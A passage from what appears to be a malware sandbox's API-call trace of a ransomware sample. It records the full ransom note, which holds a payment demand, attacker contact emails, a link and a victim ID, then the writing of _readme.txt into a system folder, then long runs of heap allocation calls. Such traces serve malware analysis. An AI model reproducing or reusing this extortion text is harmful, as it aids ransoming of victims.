6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.715] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.715] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.715] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.715] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.715] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.715] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.715] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.722] RtlAllocateHeap 